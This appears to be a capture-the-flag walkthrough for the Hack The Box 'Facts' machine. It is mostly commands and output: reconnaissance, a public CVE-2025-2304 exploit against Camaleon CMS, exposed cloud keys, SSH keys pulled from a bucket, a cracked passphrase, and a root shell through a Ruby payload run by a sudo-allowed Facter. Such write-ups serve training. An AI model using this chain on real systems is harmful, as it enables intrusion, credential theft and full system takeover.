HTB - Facts
###facts.htb
#
#
#First we recon
nmap -sV -sC -v 10.129.24.212
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
|_http-server-header: nginx/1.26.3 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#Add IP to /etc/hosts
echo '10.129.24.212 facts.htb' >> /etc/hosts
#Started exploring the webpage
#Ran ffuf to fuzz from facts.htb/ recursively
ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://facts.htb/FUZZ
#Found http://facts.htb/admin/login
#Seems like this login page could be a way in
#Browsing around: Made an account: My profile #ID is 5, implying #ID 0 or 1
#Made a signature testing PHP, JS, HTML: Everything is escaped
#Can upload a picture to account: Could craft malicious images and test cmd injection
#initial phpshell returns ERROR: Internal Server Error
#Started looking for CVEs with Camaleon v.2.9.0
CVE-2025-2304 with POC @ https://github.com/the8frust/CVE-2025-2304
#On attacker:
git clone https://github.com/the8frust/CVE-2025-2304
python3 ./exploit.py -t TARGET -u USERNAME -p PASSWORD
#We now have elevated privilege
#AWS S3 ACCESS KEY
AKIA6D05E07B2281C56E
#AWS S3 SECRET KEY
GrbC9oYbnuxNlyZKPt9HwZoZWIGCAffEvA+kfnyO
#Went back looking for another CVE
#Installed awscli tools
#and found some sshkeys and downloaded with
aws s3 sync s3://internal/.ssh ./keys --endpoint-url http://facts.htb:54321 --profile facts
#turned the id_ed25519 key to an appropriate formate
ssh2john id_ed25519 > key.john
#Ran johntheripper with rockyou
john path/to/key.john -w /usr/share/wordlists/rockyou.txt
#We got a hit the password is:
dragonballz
#Now we can connect using the key and password
ssh -i id_ed25519 trivia@10.129.24.212
passphrase: dragonballz
#Went to grab the user flag in /home/william/
295de471a20fc999c70cb71ba398815b
#sudo -l revealed
(ALL) NOPASSWD: /usr/bin/facter
#Looking into Facter gathers information on various hardware/OS related
#Its possible to add custom dir to add new ruby scripts
#1st we make a ruby script calling /bin/bash through Facter
#Payload:
Facter.add(:this) do
system("/bin/bash")
end
#Next we run Facter with our new directory containing our payload
sudo /usr/bin/facter --custom-dir /tmp/beb/this.rb
#We get a root shell
#cat /root/root.txt
fc3262c096014f37fb1633342364d71e